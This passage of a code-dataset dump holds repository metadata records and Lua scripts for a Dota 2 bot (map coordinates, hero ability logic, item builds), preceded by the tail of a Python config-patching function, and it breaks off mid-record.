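def patch_config(path, replacements=REPLACEMENTS):
    with open(path) as f:
        s = f.read()
    for pattern, repl in replacements:
        s = re.sub(pattern, repl, s)
    with open(path, 'w') as f:
        f.write(s)
```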
{
"alpha_fraction": 0.8055555820465088,
"alphanum_fraction": 0.8055555820465088,
"avg_line_length": 17,
"blob_id": "a993f25b855ddfd73939b4b866fce1373fe19811",
"content_id": "def1093014208a578750d3898d0da0002a8245ad",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 36,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Muneeb-Ahmed-Khan/muneebRepo",
"src_encoding": "UTF-8",
"text": "# muneebRepo\n Helper for Tensorflow\n"
}
] | 2 |
vpus/vpesports-enhanced-bot
|
https://github.com/vpus/vpesports-enhanced-bot
|
b3fe75972440b15da6143895f861ca061deed079
|
8c5ca0b33d609c5fc1bcd2474540bb83cfe929f1
|
6332faedce3accc52ed0da6ced845cf1a9aecbd3
|
refs/heads/master
| 2021-04-09T14:11:15.082682 | 2018-05-09T23:41:18 | 2018-05-09T23:41:18 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4463161826133728,
"alphanum_fraction": 0.5749722123146057,
"avg_line_length": 18.021127700805664,
"blob_id": "5eb4b8aa624ba83491ba379e97547df2b295a3cb",
"content_id": "a32504d28cc6e0bec8e7904c505f4e2ba19c3e72",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 5402,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 284,
"path": "/UtilityData.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "------------------------------------ Variable ----------------------------------\ntotal_prox = 0;\ntotal_remotes = 0;\ntotal_stasis = 0;\n\n-- Keep a reference to each mine\nremoteMines = {};\n-- proxMines = {};\n------------------------------------- Final ------------------------------------\n-- Get all player IDs\nrad_player_ids = GetTeamPlayers(TEAM_RADIANT);\ndir_player_ids = GetTeamPlayers(TEAM_DIRE);\n\n-- Modes for Farming\nEARLY_MINING = 0;\nEARLY_STACKING = 1;\nCONSIDER_CAMP = 2;\nATTACK_CAMP = 3;\n\nteams = {\n\tTEAM_RADIANT,\n\tTEAM_DIRE,\n\tTEAM_NEUTRAL,\n\tTEAM_NONE\n};\n\nmodes = {\n\t[\"none\"] = BOT_MODE_NONE,\n\t[\"lane\"] = BOT_MODE_LANING,\n\t[\"attack\"] = BOT_MODE_ATTACK,\n\t[\"roam\"] = BOT_MODE_ROAM,\n\t[\"retreat\"] = BOT_MODE_RETREAT,\n\t[\"secret\"] = BOT_MODE_SECRET_SHOP,\n\t[\"side\"] = BOT_MODE_SIDE_SHOP,\n\t[\"push_top\"] = BOT_MODE_PUSH_TOWER_TOP,\n\t[\"push_mid\"] = BOT_MODE_PUSH_TOWER_MID,\n\t[\"push_bot\"] = BOT_MODE_PUSH_TOWER_BOT,\n\t[\"defend_top\"] = BOT_MODE_DEFEND_TOWER_TOP,\n\t[\"defend_mid\"] = BOT_MODE_DEFEND_TOWER_MID,\n\t[\"defend_bot\"] = BOT_MODE_DEFEND_TOWER_BOT,\n\t[\"assemble\"] = BOT_MODE_ASSEMBLE,\n\t[\"team_roam\"] = BOT_MODE_TEAM_ROAM,\n\t[\"farm\"] = BOT_MODE_FARM,\n\t[\"defend_ally\"] = BOT_MODE_DEFEND_ALLY,\n\t[\"evasive\"] = BOT_MODE_EVASIVE_MANEUVERS,\n\t[\"roshan\"] = BOT_MODE_ROSHAN,\n\t[\"item\"] = BOT_MODE_ITEM,\n\t[\"ward\"] = BOT_MODE_WARD\n};\n\ndesires = {\n\tBOT_MODE_DESIRE_NONE,\n\tBOT_MODE_DESIRE_VERYLOW,\n\tBOT_MODE_DESIRE_LOW,\n\tBOT_MODE_DESIRE_MODERATE,\n\tBOT_MODE_DESIRE_HIGH,\n\tBOT_MODE_DESIRE_VERYHIGH,\n\tBOT_MODE_DESIRE_ABSOLUTE\n};\n\nactions = {\n\t[\"none\"] = BOT_ACTION_TYPE_NONE,\n\t[\"idle\"] = BOT_ACTION_TYPE_IDLE,\n\t[\"move_to\"] = BOT_ACTION_TYPE_MOVE_TO,\n\t[\"attack\"] = BOT_ACTION_TYPE_ATTACK,\n\t[\"attack_move\"] = BOT_ACTION_TYPE_ATTACKMOVE,\n\t[\"ability\"] = BOT_ACTION_TYPE_USE_ABILITY,\n\t[\"pick_rune\"] = BOT_ACTION_TYPE_PICK_UP_RUNE,\n\t[\"pick_item\"] = BOT_ACTION_TYPE_PICK_UP_ITEM,\n\t[\"drop_item\"] = BOT_ACTION_TYPE_DROP_ITEM,\n\t[\"shrine\"] = BOT_ACTION_TYPE_SHRINE,\n\t[\"delay\"] = BOT_ACTION_TYPE_DELAY\n};\n\nactionsTEST = {\n\t[BOT_ACTION_TYPE_NONE] = \"None\",\n\t[BOT_ACTION_TYPE_IDLE] = \"Idle\",\n\t[BOT_ACTION_TYPE_MOVE_TO] = \"Move To\",\n\t[BOT_ACTION_TYPE_ATTACK] = \"Attack\",\n\t[BOT_ACTION_TYPE_ATTACKMOVE] = \"Attack Move\",\n\t[BOT_ACTION_TYPE_USE_ABILITY] = \"Use Ability\",\n\t[BOT_ACTION_TYPE_PICK_UP_RUNE] = \"Pick Rune\",\n\t[BOT_ACTION_TYPE_PICK_UP_ITEM] = \"Pick Item\",\n\t[BOT_ACTION_TYPE_DROP_ITEM] = \"Drop Item\",\n\t[BOT_ACTION_TYPE_SHRINE] = \"Shrine\",\n\t[BOT_ACTION_TYPE_DELAY] = \"Delay\"\t\n};\n\ntowers = {\n\tTOWER_TOP_1,\n\tTOWER_MID_1,\n\tTOWER_BOT_1,\n\tTOWER_TOP_2,\n\tTOWER_MID_2,\n\tTOWER_BOT_2,\n\tTOWER_TOP_3,\n\tTOWER_MID_3,\n\tTOWER_BOT_3,\n\tTOWER_BASE_1,\n\tTOWER_BASE_2\n}\n\nrad_early_remote_locs = {\n\tVector(-6000, 3800),\n\tVector(-2800, 4300),\n\tVector(-900, -1200),\n\tVector(800, 500),\n\tVector(3600, 800),\n\tVector(-1700, 1100),\n\tVector(2600, -2000)\n};\n\nrad_late_remote_locs = {\n\tVector(4000, 3500),\n\tVector(5000, 4200),\n\tVector(3100, 5800),\n\tVector(6300, 2600),\n\tVector(-1700, 1100),\n\tVector(2600, -2000)\n};\n\nrad_base_remote_locs = {\n\tVector(-6600, -3500),\n\tVector(-4700, -4200),\n\tVector(-4100, -6100),\n\tVector(-5600, -4700),\n\tVector(-5200, -5100)\n};\n\ndir_early_remote_locs = {\n\tVector(6000, 3400),\n\tVector(5200, -4000),\n\tVector(3500, -5200),\n\tVector(-1700, 1100),\n\tVector(2600, 
-2000)\n};\n\ndir_late_remote_locs = {\n\tVector(4000, 3500),\n\tVector(-1700, 1100),\n\tVector(2600, -2000)\n};\n\ndir_base_remote_locs = {\n\tVector(3700, 5700),\n\tVector(4400, 3800),\n\tVector(6300, 3100),\n\tVector(4800, 4800),\n\tVector(5300, 4300)\n};\n\nrad_fountain = Vector(-6700, -6200);\ndir_fountain = Vector(6600, 6000);\n\nradiant_camp_locs = {\n\t{\n\t\tVector(2800, -4550), -- Where Neutrals spawn\n\t\tVector(3500, -4500), -- Where to plant a mine\n\t\t1,\n\t\tVector(4300, -4000), -- Where to run away to\n\t\tfalse -- Are the neutrals dead? When did they die?\n\t},\n\t{\n\t\tVector(-3600, 850),\n\t\tVector(-4400, 600),\n\t\t2,\n\t\tVector(-5500, 1500),\n\t\tfalse\n\t},\n\t{\n\t\tVector(-1800, -4500),\n\t\tVector(-1800, -3700),\n\t\t2,\n\t\tVector(-1700, -3100),\n\t\tfalse\n\t},\n\t{\n\t\tVector(300, -4700),\n\t\tVector(1150, -4500),\n\t\t2,\n\t\tVector(2000, -4000),\n\t\tfalse\n\t},\n\t{\n\t\tVector(-4700, -400), \n\t\tVector(-4800, 300),\n\t\t3,\n\t\tVector(-4700, 800),\n\t\tfalse\n\t},\n\t{\n\t\tVector(-350, -3400),\n\t\tVector(-900, -2900),\n\t\t3,\n\t\tVector(-1600, -2900),\n\t\tfalse\n\t},\n\t{\n\t\tVector(4800, -4500),\n\t\tVector(4600, -3800),\n\t\t3,\n\t\tVector(4400, -3400),\n\t\tfalse\n\t},\n\t{\n\t\tVector(-3000, -100),\n\t\tVector(-2400, 300),\n\t\t4,\n\t\tVector(-1500, 1000),\n\t\tfalse\n\t},\n\t{\n\t\tVector(100, -1900),\n\t\tVector(600, -2100),\n\t\t4,\n\t\tVector(1600, -2400),\n\t\tfalse\n\t},\n};\n\ndire_camp_locs = {\n\t{\n\t\tVector(4400, 800),\n\t\tVector(-2900, 5250),\n\t\t1\n\t},\n\t{\n\t\tVector(4400, 800),\n\t\tVector(3000, -200),\n\t\t2\n\t},\n\t{\n\t\tVector(4400, 800),\n\t\tVector(1300, 3950),\n\t\t2\n\t},\n\t{\n\t\tVector(4400, 800),\n\t\tVector(-1400, -4350),\n\t\t2\n\t},\n\t{\n\t\tVector(4400, 800),\n\t\tVector(3950, 750),\n\t\t3\n\t},\n\t{\n\t\tVector(4400, 800),\n\t\tVector(-400, 3700),\n\t\t3\n\t},\n\t{\n\t\tVector(4400, 800),\n\t\tVector(-4850, 3950),\n\t\t3\n\t},\n\t{\n\t\tVector(4400, 800),\n\t\tVector(3800, -1000),\n\t\t4\n\t},\n\t{\n\t\tVector(4400, 800),\n\t\tVector(-700, 2800),\n\t\t4\n\t},\n}\n\ntop_lane = {\n\tVector(-6600, -3300),\n\tVector(-6000, 5700),\n\tVector(3300, 5800)\n};\n\nmid_lane = {\n\tVector(-4400, -4000),\n\tVector(4100, 3500)\t\n};\n\nbot_lane = {\n\tVector(-3800, -6000),\n\tVector(5900, -6000),\n\tVector(6300, 2800)\t\n};\n"
},
{
"alpha_fraction": 0.614311695098877,
"alphanum_fraction": 0.6188598871231079,
"avg_line_length": 33.726314544677734,
"blob_id": "0bebb83e29d290e66ab0b1590f647bfe1f4f703d",
"content_id": "8f097feb6f280c685b3872be646d3a14ca2bc0ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 3298,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 95,
"path": "/mode_attack_huskar.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local npcBot = GetBot()\nlocal botTeam = GetTeam()\n\nfunction Think()\n local idle = true\n\n if npcBot:HasModifier(\"modifier_huskar_life_break_charge\") and not npcBot:HasModifier(\"modifier_huskar_inner_vitality\") and inner_vitality:IsFullyCastable() then\n print(\"Ability : Using Inner Vitality while Life Break\")\n npcBot:Action_UseAbilityOnEntity(inner_vitality, npcBot)\n local armletSlot = npcBot:FindItemSlot(\"item_armlet\")\n local armlet = nil\n if npcBot:GetItemSlotType(armletSlot) == ITEM_SLOT_TYPE_MAIN then\n armlet = npcBot:GetItemInSlot(armletSlot)\n end\n if armlet ~= nil then\n if not npcBot:HasModifier(\"modifier_item_armlet_unholy_strength\") then\n if armlet:IsFullyCastable() then\n npcBot:Action_UseAbility(armlet)\n end\n end\n end\n\n local bkbSlot = npcBot:FindItemSlot(\"item_black_king_bar\")\n local bkb = nil\n if npcBot:GetItemSlotType(bkbSlot) == ITEM_SLOT_TYPE_MAIN then\n bkb = npcBot:GetItemInSlot(bkbSlot)\n end\n if bkb ~= nil then\n if bkb:IsFullyCastable() then\n npcBot:Action_UseAbility(bkb)\n end\n end\n idle = false\n end\n\n if not burning_spear:GetAutoCastState() then\n -- print(\"Toggle it ON\")\n burning_spear:ToggleAutoCast()\n end\n\n if life_break ~= nil and life_break:IsFullyCastable() then\n local nearbyEnemies = npcBot:GetNearbyHeroes(1200, true, BOT_MODE_NONE)\n local weakerEnemy = nil\n\n for k, enemy in pairs(nearbyEnemies) do\n if weakerEnemy == nil then\n weakerEnemy = enemy\n else\n if enemy:GetHealth() < weakerEnemy:GetHealth() and not enemy:HasModifier(\"modifier_item_blade_mail_reflect\") then\n weakerEnemy = enemy\n end\n end\n end\n\n print(\"Ability : Using Life Break\")\n npcBot:Action_UseAbilityOnEntity(life_break, weakerEnemy)\n idle = false\n end\n\n -- inner vatality think --\n if not npcBot:HasModifier(\"modifier_huskar_inner_vitality\") and inner_vitality:IsFullyCastable() then\n print(\"Ability : Using Inner Vitality while Life Break\")\n npcBot:Action_UseAbilityOnEntity(inner_vitality, npcBot)\n idle = false\n end\n\n -- attack think --\n local nearbyEnemies = npcBot:GetNearbyHeroes(900, true, BOT_MODE_NONE)\n local targetEnemy = nil\n\n for k, enemy in pairs(nearbyEnemies) do\n if targetEnemy == nil then\n targetEnemy = enemy\n else\n if enemy:GetHealth() < targetEnemy:GetHealth() and not enemy:HasModifier(\"modifier_item_blade_mail_reflect\") and not enemy:IsAttackImmune() then\n targetEnemy = enemy\n end\n end\n end\n\n if targetEnemy ~= nil then\n npcBot:Action_AttackUnit(targetEnemy, true)\n idle = false\n end\n\n if idle then\n if npcBot:GetHealth() > 500 then\n local nearbyEnemies = npcBot:GetNearbyHeroes(3000, true, BOT_MODE_NONE)\n npcBot:Action_AttackUnit(nearbyEnemies[1], true)\n else\n npcBot:Action_MoveToLocation(GetAncient(GetTeam()):GetLocation())\n end\n end\n\nend"
},
{
"alpha_fraction": 0.7481481432914734,
"alphanum_fraction": 0.7518518567085266,
"avg_line_length": 23.57575798034668,
"blob_id": "22acb8c71c0599b42383f98e3044a2ead2e5c423",
"content_id": "eb4d923b3cb90f502df7f8b3f7079f3ab2c5dfee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 810,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 33,
"path": "/mode_secret_shop_legion_commander.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local npcBot = GetBot()\nlocal botTeam = npcBot:GetTeam()\n\nfunction GetDesire()\n\tif npcBot.secretShop then\n\t\treturn _G.desires[7]\n\tend\n\t\n\treturn _G.desires[1]\nend\n\nfunction Think()\n\tlocal secretShopLoc = GetShopLocation(botTeam, SHOP_SECRET)\n\tlocal bootsSlot = npcBot:FindItemSlot(\"item_travel_boots\")\n\tlocal boots = nil\n\tif npcBot:GetItemSlotType(bootsSlot) == ITEM_SLOT_TYPE_MAIN then\n\t\tboots = npcBot:GetItemInSlot(bootsSlot)\n\tend\n\n\tlocal secretDist = npcBot:DistanceFromSecretShop()\n\t\n\tif secretDist > 0 then\n\t\tif boots ~= nil and not npcBot:IsChanneling() then\n\t\t\tif boots:IsFullyCastable() then\n\t\t\t\tnpcBot:Action_UseAbilityOnLocation(boots, secretShopLoc)\n\t\t\tend\n\t\telseif not npcBot:IsChanneling() then\n\t\t\tnpcBot:Action_MoveToLocation(secretShopLoc)\n\t\tend\n\telse\n\t\tnpcBot.secretShop = false\n\tend\nend"
},
{
"alpha_fraction": 0.5510541200637817,
"alphanum_fraction": 0.5588263869285583,
"avg_line_length": 44.348018646240234,
"blob_id": "f2e9e5daca829e68be79b0643462997d37f4dea4",
"content_id": "4e27de71aaae7fe525558f6e826cf898cb11c72a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 10293,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 227,
"path": "/ability_item_usage_keeper_of_the_light.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_keeper_of_the_light\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal lane_claim = true\n\nfunction AbilityLevelUpThink()\n local skillsToLevel = build[\"skills\"]\n-- if npcBot:GetAbilityPoints() < 1 or (GetGameState() ~= GAME_STATE_PRE_GAME \n-- \tand GetGameState() ~= GAME_STATE_GAME_IN_PROGRESS) then\n-- return\n-- end\n if npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= \"-1\" \n \tand skillsToLevel[1] ~= nil then\n \tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n \ttable.remove(skillsToLevel, 1)\n end\nend\n\nfunction AbilityUsageThink()\n local botMana = npcBot:GetMana()\n local botHealth = npcBot:GetHealth()\n local bot_location_x = npcBot:GetLocation()[1]\n local bot_location_y = npcBot:GetLocation()[2]\n local action = npcBot:GetCurrentActionType()\n local action_mode = npcBot:GetActiveMode()\n\n local illuminate = npcBot:GetAbilityByName(\"keeper_of_the_light_illuminate\")\n local illuminate_end = npcBot:GetAbilityByName(\"keeper_of_the_light_illuminate_end\")\n local manaleak = npcBot:GetAbilityByName(\"keeper_of_the_light_mana_leak\")\n local chakra = npcBot:GetAbilityByName(\"keeper_of_the_light_chakra_magic\")\n local spiritform = npcBot:GetAbilityByName(\"keeper_of_the_light_spirit_form\")\n local recall = npcBot:GetAbilityByName(\"keeper_of_the_light_recall\")\n local blinding = npcBot:GetAbilityByName(\"keeper_of_the_light_blinding_light\")\n local spirit_illuminate = npcBot:GetAbilityByName(\"keeper_of_the_light_spirit_form_illuminate\")\n\n if npcBot:IsChanneling() then\n local nearbyEnemies_400 = npcBot:GetNearbyHeroes(400, true, BOT_MODE_NONE)\n if #nearbyEnemies_400 > 1 then\n npcBot:Action_UseAbility(illuminate_end)\n else\n npcBot:ActionQueue_UseAbilityOnLocation(illuminate,npcBot:GetLocation())\n end\n end\n\n if action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= BOT_ACTION_TYPE_ATTACK then\n -- chakra think --\n if chakra ~= nil and chakra:IsFullyCastable() then\n if botMana < 200 then\n npcBot:Action_UseAbilityOnEntity(chakra, npcBot)\n print(\"Ability : Using Chakra on SELF\")\n else\n local alliedHeroes = GetUnitList(UNIT_LIST_ALLIED_HEROES)\n local potential_target_hero = \"\"\n local potential_hero_mana = 4000\n for i, alliedHero in ipairs(alliedHeroes) do\n heroName = alliedHero:GetUnitName()\n if heroName ~= \"npc_dota_hero_keeper_of_the_light\" then\n distance = GetUnitToUnitDistance(npcBot, alliedHero)\n if distance < 1800 then\n ally_mana = alliedHero:GetMana()\n ally_max_mana = alliedHero:GetMaxMana()\n ally_mana_lose = ally_max_mana - ally_mana\n if ally_mana < potential_hero_mana and ally_mana_lose > 200 then\n potential_target_hero = alliedHero\n potential_hero_mana = ally_mana\n end\n end\n end\n end\n if potential_target_hero ~= \"\" then\n npcBot:ActionQueue_UseAbilityOnEntity(chakra, potential_target_hero)\n print(\"Ability in Queue : Using Chakra on someone\")\n end\n end \n end\n\n -- illuminate think --\n if action ~= BOT_ACTION_TYPE_MOVE_TO and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n local nearbyCreeps = npcBot:GetNearbyLaneCreeps(1000, true)\n local nearbyEnemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n local nearestEnemy = nil\n\n for k,enemy in pairs(nearbyEnemies) do\n if nearestEnemy == nil then\n nearestEnemy = enemy\n else\n if GetUnitToUnitDistance(nearestEnemy, npcBot) > GetUnitToUnitDistance(enemy, npcBot) then\n 
nearestEnemy = enemy\n                    end\n                end\n            end\n\n            if illuminate ~= nil and illuminate:IsFullyCastable() and (#nearbyCreeps >= 2 or #nearbyEnemies >= 2) then\n                local target = nil\n                if #nearbyCreeps > 0 then\n                    target = nearbyCreeps[1]\n                else\n                    target = nearestEnemy\n                end\n                if botTeam == 2 then\n                    local illuminateLoc = _G.getVectorBetweenTargetPercentage(npcBot, target, 0.8)\n                    if UnderSpiritFrom() then\n                        print(\"Ability in Queue : Once Casting Illuminate\", botTeam)\n                        npcBot:Action_UseAbilityOnLocation(spirit_illuminate, illuminateLoc)\n                    else\n                        print(\"Ability in Queue : Casting Illuminate\", botTeam)\n                        for i=1, 10 do\n                            npcBot:ActionQueue_UseAbilityOnLocation(illuminate, illuminateLoc)\n                        end\n                    end\n                else\n                    local illuminateLoc = _G.getVectorBetweenTargetPercentage(target, npcBot, 0.8)\n                    if UnderSpiritFrom() then\n                        print(\"Ability in Queue : Once Casting Illuminate\", botTeam)\n                        npcBot:Action_UseAbilityOnLocation(spirit_illuminate, illuminateLoc)\n                    else\n                        print(\"Ability in Queue : Casting Illuminate\", botTeam)\n                        for i=1, 10 do\n                            npcBot:ActionQueue_UseAbilityOnLocation(illuminate, illuminateLoc)\n                        end\n                    end\n                end\n            end\n        end\n    end\n\n    -- spiritform think --\n    if action ~= BOT_ACTION_TYPE_MOVE_TO and action ~= BOT_ACTION_TYPE_USE_ABILITY and not UnderSpiritFrom() then\n        -- the surrounding check already guarantees the bot is not in Spirit Form yet\n        if spiritform ~= nil and spiritform:IsFullyCastable() then\n            npcBot:ActionQueue_UseAbility(spiritform)\n            print(\"Ability in Queue : Entering Spirit Form\")\n        end\n    end\n\n    -- manaleak think --\n    if action_mode == BOT_MODE_ATTACK or action_mode == BOT_MODE_RETREAT then\n        local nearbyEnemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n        local nearestEnemy = nil\n        for k,enemy in pairs(nearbyEnemies) do\n            if nearestEnemy == nil then\n                nearestEnemy = enemy\n            else\n                if GetUnitToUnitDistance(nearestEnemy, npcBot) > GetUnitToUnitDistance(enemy, npcBot) then\n                    nearestEnemy = enemy\n                end\n            end\n        end\n\n        if action_mode == BOT_MODE_ATTACK and #nearbyEnemies > 1 then\n            local alliedHeroes = GetUnitList(UNIT_LIST_ALLIED_HEROES)\n            local potential_target_hero = nil\n            local potential_hero_distance = 0\n            for i, alliedHero in ipairs(alliedHeroes) do\n                local heroName = alliedHero:GetUnitName()\n                if heroName ~= \"npc_dota_hero_keeper_of_the_light\" then\n                    distance = GetUnitToUnitDistance(npcBot, alliedHero)\n                    if distance > 1200 and alliedHero:GetHealth()/alliedHero:GetMaxHealth()>0.8 and alliedHero:GetMana()/alliedHero:GetMaxMana()>0.8 then\n                        if potential_target_hero == nil then\n                            potential_target_hero = alliedHero\n                            potential_hero_distance = distance\n                        else\n                            if distance > potential_hero_distance then\n                                potential_target_hero = alliedHero\n                                potential_hero_distance = distance\n                            end\n                        end\n                    end\n                end\n            end\n            if potential_target_hero ~= nil then\n                local heroName = potential_target_hero:GetUnitName()\n                npcBot:ActionQueue_UseAbilityOnEntity(recall, potential_target_hero)\n                npcBot:ActionImmediate_Chat(\"I'm Recalling \" .. heroName .. 
\"!!!\", false)\n end\n end\n\n if action ~= BOT_ACTION_TYPE_USE_ABILITY and action ~= BOT_ACTION_TYPE_ATTACK and nearestEnemy ~= nil then\n if manaleak:IsFullyCastable() then\n npcBot:Action_UseAbilityOnEntity(manaleak, nearestEnemy)\n end\n if blinding:IsFullyCastable() then\n local locFactor = 1.2\n if action_mode == BOT_MODE_RETREAT then\n locFactor = 0.8\n end\n\n if botTeam == 2 then\n local blindingLoc = _G.getVectorBetweenTargetPercentage(npcBot, nearestEnemy, locFactor)\n else\n local blindingLoc = _G.getVectorBetweenTargetPercentage(nearestEnemy, npcBot, locFactor)\n end\n npcBot:Action_UseAbilityOnLocation(blinding, blindingLoc)\n end\n end\n end\n\n -- recall think --\n\n -- blinding think --\n end\nend\n\n\nfunction BuybackUsageThink()\n if DotaTime() < -30 and lane_claim then\n local lane_id = npcBot:GetAssignedLane()\n if lane_id == 1 then\n npcBot:ActionImmediate_Chat(\"I'm going Top!\", false)\n elseif lane_id == 2 then\n npcBot:ActionImmediate_Chat(\"I'm going Mid!\", false)\n elseif lane_id == 3 then\n npcBot:ActionImmediate_Chat(\"I'm going Bot!\", false)\n end\n lane_claim = false\n end\n return\nend\n\nfunction UnderSpiritFrom()\n if npcBot:HasModifier(\"modifier_keeper_of_the_light_spirit_form\") then\n return true\n else\n return false\n end\nend"
},
{
"alpha_fraction": 0.5329052805900574,
"alphanum_fraction": 0.540930986404419,
"avg_line_length": 18.184616088867188,
"blob_id": "06b1154b224fc32015a860dacea16b07af5fb452",
"content_id": "97442303c35bbee5c992e2d3a24ff39a3e361fc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 1246,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 65,
"path": "/item_build_tinker.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n\t\"item_courier\",\n \"item_circlet\",\n \"item_mantle\",\n \"item_recipe_null_talisman\",\n \"item_tango\",\n \"item_bottle\",\n \"item_boots\",\n \"item_recipe_travel_boots\",\n \"item_gauntlets\",\n \"item_gauntlets\",\n \"item_ring_of_regen\",\n \"item_recipe_soul_ring\",\n \"item_blink\",\n \"item_energy_booster\",\n \"item_void_stone\",\n \"item_recipe_aether_lens\",\n \"item_point_booster\",\n \"item_ogre_axe\",\n \"item_blade_of_alacrity\",\n \"item_staff_of_wizardry\",\n \"item_mystic_staff\",\n \"item_platemail\",\n \"item_recipe_shivas_guard\"\n}\n\nlocal laser = \"tinker_laser\"\nlocal missle = \"tinker_heat_seeking_missile\"\nlocal march = \"tinker_march_of_the_machines\"\nlocal rearm = \"tinker_rearm\"\n\nX[\"skills\"] = {\n laser, \n march, \n march, \n laser, \n march,\n rearm, \n missle, \n march, \n rearm, \n talents[2],\n missle, \n missle,\n laser,\n laser,\n talents[4],\n laser, \n \"-1\", \n rearm,\n \"-1\", \t\n talents[5],\n \"-1\", \t\n \"-1\", \t\n \"-1\", \n \"-1\", \n talents[7]\n}\n\nreturn X"
},
{
"alpha_fraction": 0.49934980273246765,
"alphanum_fraction": 0.5253576040267944,
"avg_line_length": 22.793813705444336,
"blob_id": "0f0aded61315284355f95e1b89357727a978e133",
"content_id": "7324c0ff440903a55f3ba4e4b2ab65b433678bb4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2307,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 97,
"path": "/item_build_abaddon.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "X = {}\nrequire(GetScriptDirectory() .. \"/UtilityFunctions\")\nlocal npcBot = GetBot()\nlocal talents = fillTalentTable(npcBot)\n\nX[\"items\"] = {\n -- start --\n\t\"item_stout_shield\",\n \"item_flask\",\n \"item_tango\",\n \"item_enchanted_mango\",\n \"item_branches\",\n \"item_branches\",\n -- magic wand --\n \"item_magic_stick\",\n -- Helm of Dominator --\n \"item_ring_of_regen\",\n \"item_branches\",\n \"item_recipe_headdress\",\n \"item_ring_of_health\",\n \"item_gloves\",\n -- phase boots --\n \"item_boots\",\n \"item_blades_of_attack\",\n \"item_blades_of_attack\",\n -- radiance --\n \"item_relic\",\n \"item_recipe_radiance\",\n -- medallion of courage --\n \"item_chainmail\",\n \"item_sobi_mask\",\n \"item_blight_stone\",\n -- solar crest --\n \"item_talisman_of_evasion\",\n -- Hood of Defiance --\n \"item_ring_of_health\",\n \"item_cloak\",\n \"item_ring_of_regen\",\n -- Pipe of Insight --\n \"item_ring_of_regen\",\n \"item_branches\",\n \"item_recipe_headdress\",\n \"item_recipe_pipe\",\n -- Shiva's Guard --\n \"item_platemail\",\n \"item_mystic_staff\",\n \"item_recipe_shivas_guard\",\n -- Octarine Core --\n \"item_point_booster\",\n \"item_vitality_booster\",\n \"item_energy_booster\",\n \"item_mystic_staff\",\n}\n\nlocal death_coil = \"abaddon_death_coil\"\nlocal aphotic_shield = \"abaddon_aphotic_shield\"\nlocal forstmourne = \"abaddon_frostmourne\"\nlocal borrowed_time = \"abaddon_borrowed_time\"\n\nX[\"skills\"] = {\n aphotic_shield, --1\n forstmourne, --2 \n aphotic_shield, --3\n forstmourne, --4\n aphotic_shield, --5\n borrowed_time, --6\n aphotic_shield, --7\n forstmourne, --8\n forstmourne, --9\n talents[2], --10\n death_coil, --11\n borrowed_time, --12\n death_coil, --13\n death_coil, --14\n talents[4], --15\n death_coil, --16\n -- \"-1\", --17\n borrowed_time, --18\n -- \"-1\", --19\n talents[5], --20\n -- \"-1\", \t --21\n -- \"-1\", \t --22\n -- \"-1\", --23\n -- \"-1\", --24\n talents[7], --25\n \"separate\",\n talents[1],\n talents[2],\n talents[3],\n talents[4],\n talents[5],\n talents[6],\n talents[7],\n talents[8],\n talents[9],\n}\nreturn X"
},
{
"alpha_fraction": 0.49760764837265015,
"alphanum_fraction": 0.5281100273132324,
"avg_line_length": 23.970149993896484,
"blob_id": "88a00cfd7ead6644b303869983e2bb37a073945a",
"content_id": "75c689448469c1297b0cedae398583deb2c74c8d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 1672,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 67,
"path": "/item_build_huskar.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
